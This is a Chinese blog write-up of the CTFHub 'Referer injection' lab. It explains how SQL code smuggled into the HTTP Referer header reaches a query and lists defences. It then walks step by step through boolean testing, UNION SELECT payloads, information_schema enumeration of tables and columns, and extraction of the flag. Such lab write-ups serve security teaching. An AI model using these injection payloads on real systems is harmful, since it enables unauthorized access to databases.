CTFHub - Refer注入

最新推荐文章于 2024-04-09 21:52:17 发布
最新推荐文章于 2024-04-09 21:52:17 发布
阅读量595 收藏
点赞数 2
分类专栏: CTFHub 文章标签: 网络安全 web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Have_a_great_day/article/details/132794759
版权

目录

1. Refer注入原理

2. 防御

3. 注入流程

3.1 初始界面

3.2 判断注入方式、类型

3.3 判断回显位置

3.4 获取数据库 库名称

3.5 获取数据表 表名称

3.6 获取列名

3.7 获取数据

1. Refer注入原理

  1. Refer注入是一种利用HTTP头字段中的Referer(引荐者)信息来进行攻击的注入技术。Referer字段通常用于告诉服务器请求的来源,即用户是通过哪个页面或链接访问当前页面的。
  2. Refer注入攻击的原理是通过篡改Referer字段中的值,将恶意的SQL代码插入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。攻击者可以通过修改发送给服务器的HTTP请求的Referer字段,将恶意的SQL代码作为Referer值注入进去。

2. 防御

  1. 对于从Referer字段中提取的数据,始终进行充分的验证和过滤。
  2. 确保服务器端的输入验证和过滤逻辑能够正确处理所有的HTTP请求头字段。
  3. 使用参数化查询或预编译语句,而不是将用户提供的数据直接拼接到SQL查询中。
  4. 最小化数据库用户的权限,确保数据库用户只能执行必要的操作。
  5. 在应用程序中实施访问控制和身份验证,限制用户对敏感数据和操作的访问。

3. 注入流程

3.1 初始界面

        一开始通过bp 抓到的数据包是没有Refer字段的。如下图。

        Referer字段通常用于告诉服务器请求的来源,即用户是通过哪个页面或链接访问当前页面的。       

        通俗的讲:需要向页面发送一个请求后,才会带上Reder字段。如下:第一二张图

3.2 判断注入方式、类型

        referer:1        页面存在回显,可以使用联合查询。

        referer:1'        页面不存在回显。

        referer:1 and 1=1        所以是True and True,结果还是True,页面存在回显。

        referer:1 and 1=2        所以是 True and False,结果还是False,页面不存在回显。可判断此处是数字型注入。

3.3 判断回显位置

        select 语句有几列那么需要输入几列。

        Sqli 中有两列,所以输入1和2,判断数字的回显位置。

3.4 获取数据库 库名称

        此处把第1列换成了version()版本号,2换成了database() 数据库名称

-1 union select version(),database()

3.5 获取数据表 表名称

        group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。

        information_schema:关系型数据库中,包括 MySQL、PostgreSQL等,存在一个系统数据库叫做 "information_schema",它存储了关于数据库中元数据(metadata)的信息。

        information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。

        table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。

-1 union select version(),group_concat(table_name)from information_schema.tables where table_schema=database()

3.6 获取列名

         table_name='vbqllcwzws' :选择表名为【vbqllcwzws】的表的数据。

-1 union select version(),group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='vbqllcwzws'

3.7 获取数据

-1 union select version(),ogkscutppt from vbqllcwzws

懒羊羊安全
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-Cookie注入
Web学习之路
03-28 202
cookie啊
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 4610
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
最新发布
Static______的博客
04-09 1328
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
[CTFhub]CTFhub技能树SQL注入——Refer注入
KKleeeaa的博客
04-05 458
提示:本文章仅限学习参考,切勿用于非法用途。
ctfhub Refer注入
weixin_43326436的博客
06-10 900
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库sqli 继续爆表 123 union select (select group_c
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 744
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
cth-refer
03-05
寻找可共享的组件模板? 去这里-> svelte-tailwindcss-模板这是Svelte项目模板的分支,用于启用Tailwindcss。 有关更多信息,请参阅 。 要使用基于此模板创建一个新项目: npx degit sarioglu/svelte-tailwindcss-...
Bus-refer-system.rar_公交查询系统
09-14
【公交查询系统】是一个基于MFC(Microsoft Foundation Classes)框架开发的应用程序,它主要用于帮助用户查询公共交通线路,尤其是公交车的相关信息。MFC是微软提供的一种C++类库,用于简化Windows应用程序的开发,...
uackage-multiplication-referto.rar_N55_Windows编程
09-21
标题中的"uackage-multiplication-referto.rar_N55_Windows编程"暗示了这是一个关于Windows平台下编程的项目,特别是使用Microsoft Visual C++(VC)进行界面开发的实践案例。"N55"可能是一个特定的版本号或者项目...
Magento Affiliate Extension - Refer a Friend-crx插件
04-01
语言:English Magento 2 Affiliate Extension是一个很棒的工具,可为您的网站创建联盟计划。 最佳推荐朋友扩展 Magento 2 Affiliate Extension是一个很棒的工具,可为您的网站创建联盟计划。 “推荐朋友”与各种设备...
Magento会员推广 - 推荐朋友「Magento Affiliate Extension - Refer a Friend」-crx插件
03-10
Magento 2 Affiliate Extension是一个很棒的工具,可以为您的网站创建联盟计划。最好推荐朋友扩展程序 Magento 2 Affiliate Extension是一个很棒的工具,可为您的网站创建联盟计划。 “推荐朋友”与各种设备兼容且...
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1223
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
24-4 SQL 注入 - http头注入referer注入
weixin_43263566的博客
02-28 350
在代码中,通过检查用户输入的用户名和密码,然后构造SQL语句查询数据库中是否存在匹配的用户记录。如果查询成功,则会将referer和IP地址插入到referers表中,并显示用户的referer信息。如果查询失败,则会显示错误信息,并显示一个图片。这段代码是一个简单的演示网页,主要用于演示头部注入(Header Injection)和基于错误的SQL注入攻击。用户可以在表单中输入用户名和密码,然后提交到服务器端进行处理。
攻防_漏洞_referer
redglare的博客
11-24 2039
引用:Referer 是 HTTP 请求header 的一部分,当浏览器(或者模拟浏览器行为)向web 服务器发送请求的时候,头信息里有包含 Referer 。 比如我在www.google.com 里有一个www.baidu.com 链接,那么点击这个www.baidu.com ,它的header 信息里就有: Referer=http://www.google.com 那么可以利用这个来防止盗链了,比如我只允许我自己的网站访问我自己的图片服务器,那我的域名是www.google.com, 那么
CTFhub Refer注入
plant1234的博客
06-18 1324
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHub技能树web(持续更新)--SQL注入--Refer注入
jiuyongpinyin的博客
09-06 510
Refer注入 首先根据题目提示,实在referer处输入id,那么我们先抓包: 那么我们在发送包的时候携带上这个参数: 这里有回显了,接下来的事情就好办了,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 这里注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库里面的表名: 得到了奇怪的表名,查看这个表名里面的列: 得到列名,之后爆破里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
ctf之xff_referer伪造
qq_53106085的博客
10-17 3716
xff:xff 是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。格式为:X-Forwarded-For: 本机IP, 代理1IP, 代理2IP, 代理2IP refererreferer 是http的拓展头部,作用是记录当前请求页面的来源页面的地址。服务器使用referer确认访问来源,如果referer内容不符合要求,服务器可以拦截或者重定
CTFHub | Cookie注入,UA注入Refer注入,过滤空格(利用hackbar插件)
qq_73861475的博客
11-18 956
User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。一些网站会把用户的 UA 首部信息写入数据库,用来收集和统计用户信息,如果操作不当就有可能会导致 UA 注入。【超详细版】学习SQL注入看这篇就够了(原理及思路绕过)_sql注入教程_网络安全-李彦暗的博客-CSDN博客1、界面能够回显数据库查询到的数据(必要条件);2、界面回显内容至少能够显示数据库中的某列数据(必要条件);
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
start-up error 03. refer easypbc user guide
01-12
start-up error 03是指在启动过程中出现的错误代码。根据错误提示,建议用户参考《easypbc用户指南》以了解更多相关信息。 在遇到start-up error 03时,用户可以首先查找《easypbc用户指南》中有关该错误代码的章节。该指南通常提供了各种错误代码及其对应的解决方案。 用户需要根据错误代码03的描述,找到相应的解决方案方法。指南中可能会提供一系列针对该错误的步骤或操作说明。用户需要按照指南的建议进行操作,逐步排除问题,并尝试修复错误。 如果用户在《easypbc用户指南》中找不到与start-up error 03相对应的章节,建议联系easypbc的技术支持团队以获取更多帮助。他们可能会要求进一步描述问题的细节或提供其他支持手段,以便尽快解决start-up error 03问题。 总结而言,start-up error 03是指在启动过程中出现的错误代码。获取《easypbc用户指南》,并参考其中的相关章节,将帮助用户理解该错误并采取适当的措施来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值